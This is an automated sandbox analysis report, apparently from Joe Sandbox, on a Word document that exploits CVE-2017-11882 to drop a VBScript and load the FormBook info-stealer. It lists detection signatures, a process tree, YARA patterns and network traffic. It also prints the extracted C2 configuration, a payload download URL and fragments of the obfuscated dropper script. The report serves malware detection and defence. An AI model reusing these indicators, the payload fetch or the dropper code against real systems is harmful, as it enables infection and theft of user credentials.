Windows Analysis Report RFQ-CIF DT22.doc

Overview

General Information

Sample Name: RFQ-CIF DT22.doc
Analysis ID: 532827
MD5: 66c72e808d6803f22fcd6ec419a6f039
SHA1: 0ac316f9fd8f6b3d8cfd05924f2c3704df112df7
SHA256: 0c5704edd32b5754f2caf5a45caef11e0fa1a9381c84b05f391b9b8d1c101a3a
Tags: doc, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document contains OLE streams which likely are hidden ActiveX objects
Sigma detected: Office product drops script at suspicious location
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Maps a DLL or memory area into another process
Sigma detected: Suspicious Script Execution From Temp Folder
Document contains OLE streams with names of living off the land binaries
Creates processes via WMI
Found potential equation exploit (CVE-2017-11882)
Injects a PE file into a foreign processes
Tries to detect virtualization through RDTSC time measurements
Sigma detected: WScript or CScript Dropper
Sample uses process hollowing technique
Writes to foreign memory regions
Sigma detected: Microsoft Office Product Spawning Windows Shell
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Very long command line found
Microsoft Office drops suspicious files
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Found suspicious RTF objects
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Office Equation Editor has been started
Creates a window with clipboard capturing capabilities
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2704 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 668 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cmd.exe (PID: 2996 cmdline: CmD.exe /C cscript %tmp%\Client.vbs A C MD5: AD7B9C14083B52BC532FBA5948342B98)
      • cscript.exe (PID: 2700 cmdline: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C MD5: A3A35EE79C64A640152B3113E6E254E2)
  • powershell.exe (PID: 1344 cmdline: Powershell (long obfuscated command line omitted) MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • calc.exe (PID: 2008 cmdline: {path} MD5: 60B7C0FEAD45F2066E5B805A91F4F0FC)
      • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • cscript.exe (PID: 2816 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: A3A35EE79C64A640152B3113E6E254E2)
          • cmd.exe (PID: 2408 cmdline: /c del "C:\WINDOWS\syswow64\calc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cybocross.com/t1st/"], "decoy": ["metaplanck.com", "blackieriver.com", "roswitha-johns.com", "medstarthealth.info", "coin-master.site", "jadeshomes.com", "institutowholelife.com", "cobodoro.com", "redsoxfever.com", "mybestrent.com", "avinashweddingplanner.com", "gzjiakangyy.com", "irectoryofmedicalschools.com", "sidelutagu.biz", "myapoison.com", "356792.com", "waplosik.online", "saverinstitue.com", "derva.link", "dddream-mip.com", "sicilyholidayhouses.com", "nakedpornpics.xyz", "votersfirstmissouri.com", "rebeccadehl.com", "dinaautoricemill.com", "jjzv.quest", "scoutmasterhub.online", "ecommercians.com", "laoniuys151.xyz", "berufsausbilderverband.com", "moonlive.win", "prootro.com", "themetaversebible.com", "huolm.com", "builderindoncaster.com", "getbookedva.com", "freemockup.store", "leeyo.net", "monicas.xyz", "seferihisarveteriner.net", "appsee.net", "truesarang.com", "rosscreekranch.com", "anunturibaneasa.xyz", "yesmeehoo.com", "b2bsaassystems.com", "greatmumbaiescorts.com", "arthropace.com", "francesca-anselmi.com", "seattleselects.com", "fairtravel.online", "chopy.house", "hakaiyue.com", "liberarmoden.com", "sobledis.com", "masononeill.xyz", "metechrobot.com", "cneje0.ltd", "arvoreknowledgelearning.com", "milan-sites.com", "zoedebets.online", "lavyx.com", "answercode.xyz", "foodcartgps.net"]}

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp | rtf_cve2017_11882_ole | Attempts to identify the exploit CVE 2017 11882 | John Davison
  • 0x3000:$headers: 1C 00 00 00 02 00 9E C4 A9 00 00 00 00 00 00 00 C8 A7 5C 00 C4 EE 5B 00 00 00 00 00 03 01 01 03 0A
  • 0x3021:$font: 0A 01 08 5A 5A
  • 0x3052:$winexec: 12 0C 43 00
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp | EXP_potential_CVE_2017_11882 | unknown | ReversingLabs
  • 0x0:$docfilemagic: D0 CF 11 E0 A1 B1 1A E1
  • 0x2f00:$equation1: Equation Native
  • 0x920:$equation2: Microsoft Equation 3.0
  • 0x3029:$exe: .exe
  • 0x3052:$address: 12 0C 43 00

Memory Dumps

Source | Rule | Description | Author | Strings
0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source | Rule | Description | Author | Strings
11.0.calc.exe.400000.2.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
11.0.calc.exe.400000.2.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
11.0.calc.exe.400000.2.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
11.0.calc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
11.0.calc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 668, ProcessCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ProcessId: 2996
Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process started; Author: Florian Roth, Max Altgelt; Data: Command: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine|base64offset|contains: r+, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2996, ProcessCommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, ProcessId: 2700
Sigma detected: WScript or CScript Dropper
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community; Data: Command: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine|base64offset|contains: r+, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2996, ProcessCommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, ProcessId: 2700
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 668, ProcessCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ProcessId: 2996

Data Obfuscation:

Sigma detected: Office product drops script at suspicious location
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2704, TargetFilename: C:\Users\user\AppData\Local\Temp\Client.vbs

Jbx Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp; Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Found malware configuration
Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp; Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: RFQ-CIF DT22.doc; Virustotal: Detection: 25%
Source: RFQ-CIF DT22.doc; ReversingLabs: Detection: 15%
Yara detected FormBook
Source: Yara match; File source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY
Source: 11.0.calc.exe.400000.2.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.0.calc.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.2.calc.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.0.calc.exe.400000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Found potential equation exploit (CVE-2017-11882)
Source: Static RTF information: Object: 1 Offset: 0001CF7Bh
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Windows\SysWOW64\cmd.exe
Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr; Stream path '_1699974672/\x1CompObj' : ...........................F....Microsoft Equation
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown; HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: Binary string: wntdll.pdb source: calc.exe, calc.exe, 0000000B.00000003.488729930.00000000007C0000.00000004.00000001.sdmp, calc.exe, 0000000B.00000002.542590602.0000000000CB0000.00000040.00000001.sdmp, calc.exe, 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, calc.exe, 0000000B.00000003.487607468.0000000000660000.00000004.00000001.sdmp, cscript.exe
Source: Binary string: cscript.pdbN source: calc.exe, 0000000B.00000002.541582055.0000000000584000.00000004.00000020.sdmp, calc.exe, 0000000B.00000002.541504670.0000000000430000.00000040.00020000.sdmp
Source: Binary string: cscript.pdb source: calc.exe, 0000000B.00000002.541582055.0000000000584000.00000004.00000020.sdmp, calc.exe, 0000000B.00000002.541504670.0000000000430000.00000040.00020000.sdmp, cscript.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 13_2_00B8F0D3 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,13_2_00B8F0D3

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Temp\Client.vbs
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 162.159.135.233:443
Source: global traffic; DNS query: name: google.com
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 4x nop then sub dword ptr [esp+04h], 0Ch 13_2_00B85AD1

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Network Connect: 47.241.96.113 80
Source: C:\Windows\explorer.exe; Domain query: www.foodcartgps.net
Source: C:\Windows\explorer.exe; Domain query: www.milan-sites.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.cybocross.com/t1st/
Source: Joe Sandbox View; JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic; HTTP traffic detected: GET /t1st/?axoXKTD=uTpqzRmP4oAoFu5bW/C1NBvei3ZEHQ9lndq23HdAXkDs/tJRE4xymzeaNit+87gYgYiprQ==&bx=7nL09FJ HTTP/1.1 | Host: www.milan-sites.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic; HTTP traffic detected: GET /attachments/915347845752705109/915799206072045578/m.jpg HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: cdn.discordapp.com | Connection: Keep-Alive
Source: Joe Sandbox View; ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox View; IP Address: 162.159.135.233
          Source: explorer.exe, 0000000C.00000000.530879948.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509117960.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 0000000C.00000000.503719352.00000000083FD000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.531077860.000000000457A000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 0000000C.00000000.503719352.00000000083FD000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.531077860.000000000457A000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.495179620.0000000008374000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.513635370.0000000008374000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 0000000C.00000000.510382629.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493209706.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3C4C0964-F4E2-47CE-9342-09F02AAEAA3F}.tmp
          Source: unknown DNS traffic detected: queries for: google.com
          Source: global traffic HTTP traffic detected:
            GET /attachments/915347845752705109/915799206072045578/m.jpg HTTP/1.1
            Accept: */*
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Host: cdn.discordapp.com
            Connection: Keep-Alive
          Source: global traffic HTTP traffic detected:
            GET /t1st/?axoXKTD=uTpqzRmP4oAoFu5bW/C1NBvei3ZEHQ9lndq23HdAXkDs/tJRE4xymzeaNit+87gYgYiprQ==&bx=7nL09FJ HTTP/1.1
            Host: www.milan-sites.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
          Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49165 version: TLS 1.2
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Window created: window name: CLIPBRDWNDCLASS

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match File source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match File source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 11.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          Document contains OLE streams which likely are hidden ActiveX objects
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.drStream path '_1699974670/\x1Ole10Native' : .!....Client.vbs.C:\Path\Client.vbs.........C:\Pat
          Malicious sample detected (through community Yara rule)
          Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp, type: DROPPED Matched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs
          Document contains OLE streams with names of living off the land binaries
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.drStream path '_1699974670/\x1Ole10Native' : .!....Client.vbs.C:\Path\Client.vbs.........C:\Path\Client.vbs..!..SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..sKeys0xCRC341414141 = Eval (E0xCRC341414141(")"""",emaNtpircS.tpircSW,emaNlluFtpircS.tpircSW(ecalper"))..GetObject (E0xCRC341414141("B0A85DF40C00-9BDA-0D11-0FC1-62CD539F:wen"))..F = lValue0xCRC341414141 + "\" + WScript.ScriptName..If sKeys0xCRC341414141 = lValue0xCRC341414141 Then..WScript.Quit()..SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..Else..End If........Function F0xCRC341414141()..Execute("TristateUseDefault0xCRC341414141= ArRAy (""eT"",""aE"",""rC"")")..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..F0xCRC341414141 = E0xCRC341414141( Join (TristateUseDefault0xCRC341414141,""))..End Function........Function G0xCRC341414141()..G0xCRC341414141 = "\toor\.\\!}etanosrepmi=leveL"..End Function........Function H0xCRC341414141()..H0xCRC341414141 = "noitanosrepmi{:stmgmniw"..End Function........Function I0xCRC341414141()..I0xCRC341414141 = E0xCRC341414141 ("putratSssecorP_23niW")..End Function........Function J0xCRC341414141()..'Check the output directories drive to ensure there is enough free space for the files...If 